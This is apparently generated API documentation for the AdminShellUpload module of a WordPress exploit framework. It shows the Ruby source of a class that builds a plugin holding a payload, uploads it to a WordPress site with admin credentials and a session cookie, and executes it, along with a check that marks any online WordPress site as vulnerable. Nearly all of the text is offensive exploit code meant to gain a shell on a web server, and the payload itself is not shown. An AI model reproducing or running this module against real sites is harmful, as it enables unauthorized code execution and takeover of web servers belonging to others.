class Wpxf::Exploit::AdminShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Net::HttpClient::new
# File lib/wpxf/modules/exploit/shell/admin_shell_upload.rb, line 9 def initialize super update_info( name: 'Admin Shell Upload', desc: %( This module will generate a plugin, pack the payload into it and upload it to a server running WordPress; providing valid admin credentials are used. ), author: [ 'rastating' ], date: 'Feb 21 2015' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/admin_shell_upload.rb, line 26 def check return :vulnerable if wordpress_and_online? :unknown end
requires_authentication()
click to toggle source
# File lib/wpxf/modules/exploit/shell/admin_shell_upload.rb, line 31 def requires_authentication true end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/admin_shell_upload.rb, line 35 def run return false unless super emit_info 'Uploading payload...' res = upload_payload_as_plugin_and_execute( Utility::Text.rand_alpha(10), Utility::Text.rand_alpha(10), session_cookie ) !res.nil? end